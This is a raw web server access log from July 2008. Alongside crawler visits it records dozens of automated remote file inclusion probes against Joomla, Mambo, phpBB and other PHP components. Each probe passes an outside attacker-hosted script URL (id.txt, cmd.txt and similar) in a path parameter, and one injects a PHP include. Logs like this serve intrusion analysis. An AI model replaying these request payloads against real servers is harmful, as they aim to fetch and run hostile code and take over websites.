65.55.211.28 - - [13/Jul/2008:10:20:15 -0700] "GET /bikes/dteel/?D=A HTTP/1.1" 200 9656 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:20:23 -0700] "GET /logs/access_080225.log/index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:20:23 -0700] "GET /index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:20:24 -0700] "GET /logs/index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.55.211.39 - - [13/Jul/2008:10:20:54 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [13/Jul/2008:10:20:54 -0700] "GET /bikes/dteel/?S=A HTTP/1.1" 200 9656 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:20:54 -0700] "GET /logs/access_080329.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:20:55 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:20:55 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:20:59 -0700] "GET /logs/access_071223.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:21:04 -0700] "GET /logs/access_080315.log/!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:21:05 -0700] "GET /!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:21:08 -0700] "GET /logs/!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:10:21:16 -0700] "GET /index2.php/?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:21:16 -0700] "GET /logs/access_080105.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:10:21:17 -0700] "GET /logs/index2.php/?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://knightkittens.com/images/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:21:28 -0700] "GET /logs/access_071219.log/!scanhttp://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.76.203.217 - - [13/Jul/2008:10:21:30 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:21:48 -0700] "GET /logs/access_080117.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.iglesialcs.cl/newweb//images/stories/.bash/km.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:10:22:55 -0700] "GET /logs//?option=com_custompages&cpage=http://knightkittens.com/images/ma??? HTTP/1.1" 200 55998 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.72.112.223 - - [13/Jul/2008:10:22:56 -0700] "GET //?option=com_custompages&cpage=http://knightkittens.com/images/ma??? HTTP/1.1" 200 18441 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.1.26.136 - - [13/Jul/2008:10:23:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://realbori.com/bbs/dosiris.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.221.130.15 - - [13/Jul/2008:10:23:14 -0700] "GET /logs/access_080218.log/index2.php?pagina=http://www.archfuck.ru/administrator/components/com_remository/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:23:25 -0700] "GET /logs/index2.php?_SERVER[DOCUMENT_ROOT]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:23:25 -0700] "GET /index2.php?_SERVER[DOCUMENT_ROOT]=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:23:32 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
194.79.75.195 - - [13/Jul/2008:10:23:34 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/elsiavaria/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:24:26 -0700] "GET /logs/access_080118.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:10:24:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:24:33 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:24:34 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:10:24:45 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
70.85.102.132 - - [13/Jul/2008:10:24:45 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/sofiawila/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
203.146.102.38 - - [13/Jul/2008:10:25:54 -0700] "GET /logs/access_080218.log/?sourcedir=http://www.iglesialcs.cl/newweb//images/stories/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.143.233.40 - - [13/Jul/2008:10:26:24 -0700] "GET /logs/access_080225.log/index.php?option=com_estateagent&Itemid=&mosConfig_absolute_path=http://www.terrazon.com.ar/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:10:27:52 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:28:16 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:28:17 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:28:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:28:20 -0700] "GET /logs/access.log/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:28:21 -0700] "GET /errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:28:21 -0700] "GET /logs/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.69 - - [13/Jul/2008:10:28:51 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.27.78.150/xoops2/modules/cjaycontent/admin/editor2/lib/lang/en/mambo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.19.69 - - [13/Jul/2008:10:28:51 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://163.27.78.150/xoops2/modules/cjaycontent/admin/editor2/lib/lang/en/mambo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.28 - - [13/Jul/2008:10:29:30 -0700] "GET /bikes/dteel/15JAN08/ HTTP/1.1" 200 710 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
217.147.29.190 - - [13/Jul/2008:10:30:08 -0700] "GET /logs/access_080329.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [13/Jul/2008:10:30:09 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.29.190 - - [13/Jul/2008:10:30:12 -0700] "GET /logs//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:10:30:22 -0700] "GET /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
116.125.113.115 - - [13/Jul/2008:10:30:22 -0700] "GET /logs/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
217.147.29.190 - - [13/Jul/2008:10:30:34 -0700] "GET /logs/access_080218.log//administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.6.155.114 - - [13/Jul/2008:10:30:58 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.56.49 - - [13/Jul/2008:10:31:02 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.6.155.114 - - [13/Jul/2008:10:31:06 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.142.212.191 - - [13/Jul/2008:10:31:55 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
68.142.212.191 - - [13/Jul/2008:10:31:56 -0700] "GET /blog/wp-content/uploads/picture-015-800x600.jpg HTTP/1.0" 200 160195 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" "dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:32:02 -0700] "GET /logs/access_080218.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:32:03 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:32:03 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.190.37 - - [13/Jul/2008:10:33:19 -0700] "GET /logs//sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.199.190.37 - - [13/Jul/2008:10:33:20 -0700] "GET //sub.php?s=http://www.ireo.org//administrator/components/com_joomla-visites/core/include/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.204.5.199 - - [13/Jul/2008:10:33:27 -0700] "HEAD /bikes/dteel/2008-05-30/CreSTOC_044M.jpg HTTP/1.1" 200 0 "-" "User-Agent: BoardReader-Image-Fetcher /1.0 info@boardreader.com" "www.dmulk.com"
74.204.5.199 - - [13/Jul/2008:10:33:29 -0700] "HEAD /bikes/dteel/2008-05-30/CreSTOC_044M.jpg HTTP/1.1" 200 0 "-" "User-Agent: BoardReader-Image-Fetcher /1.0 info@boardreader.com" "www.dmulk.com"
195.70.36.107 - - [13/Jul/2008:10:33:29 -0700] "GET /logs/access_080118.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[CONFIG_PATH]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.204.5.199 - - [13/Jul/2008:10:33:37 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_044M.jpg HTTP/1.1" 200 77224 "-" "User-Agent: BoardReader-Image-Fetcher /1.0 info@boardreader.com" "www.dmulk.com"
74.204.5.199 - - [13/Jul/2008:10:33:39 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_044M.jpg HTTP/1.1" 200 77224 "-" "User-Agent: BoardReader-Image-Fetcher /1.0 info@boardreader.com" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:34:06 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:34:06 -0700] "GET //admin/index.php?o=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:34:07 -0700] "GET /logs//admin/index.php?o=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:34:16 -0700] "GET /logs/access_080207.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:34:44 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:34:47 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
72.29.68.220 - - [13/Jul/2008:10:34:52 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [13/Jul/2008:10:34:52 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.topshoppingcenters.com/mvk/bot/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:35:05 -0700] "GET /logs/access_071224.log//admin/index.php?o=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:35:05 -0700] "GET //admin/index.php?o=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:35:05 -0700] "GET /logs//admin/index.php?o=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.246 - - [13/Jul/2008:10:35:55 -0700] "GET /logs/access_070921.log HTTP/1.0" 200 70813 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:36:21 -0700] "GET /logs//?prefix=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 55998 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:36:23 -0700] "GET //?prefix=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 18379 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
217.147.29.190 - - [13/Jul/2008:10:36:44 -0700] "GET //administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:37:25 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=[INJEKAN]http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:37:25 -0700] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=[INJEKAN]http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:37:48 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:37:48 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:37:49 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:38:21 -0700] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:38:21 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:38:23 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
82.165.253.62 - - [13/Jul/2008:10:38:23 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_wrapper&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.rostop.com/zerocool/id.txt??? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:38:32 -0700] "GET /logs/access_080225.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.110.22.76 - - [13/Jul/2008:10:39:10 -0700] "GET /logs/access_080313.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://i.afmcpune.com/servlets/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.109.30.182 - - [13/Jul/2008:10:39:38 -0700] "GET http://www.dmulk.com/logs/access_080211.log HTTP/1.0" 200 393216 "-" "o11lbxlysosotfu1hriig icdtuj" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:39:44 -0700] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:10:40:35 -0700] "GET /logs/access.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:10:40:35 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.110.250.75 - - [13/Jul/2008:10:40:35 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://kitchensaver.biz//catalog/images/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.188.5.164 - - [13/Jul/2008:10:40:39 -0700] "GET /index.php?content=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 200 18441 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
59.188.5.164 - - [13/Jul/2008:10:40:39 -0700] "GET /logs/index.php?content=http://www.fx-arts.de//contenido/cronjobs/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
202.221.143.111 - - [13/Jul/2008:10:40:42 -0700] "GET /logs/access_080303.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cncascais.com/img/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.37.237.58 - - [13/Jul/2008:10:40:47 -0700] "GET /logs/access_080313.log//admin/index.php?o=http://iconodemexico.com///components/com_mosres/cal/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:40:59 -0700] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:40:59 -0700] "GET //public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.117 - - [13/Jul/2008:10:41:12 -0700] "GET /logs/access_080313.log//admin/index.php?o=http://h1.ripway.com/cmdid/idvscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [13/Jul/2008:10:41:21 -0700] "GET /logs/access_080322.log/modules/Ultrastats/include/functions_common.php?gl_root_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
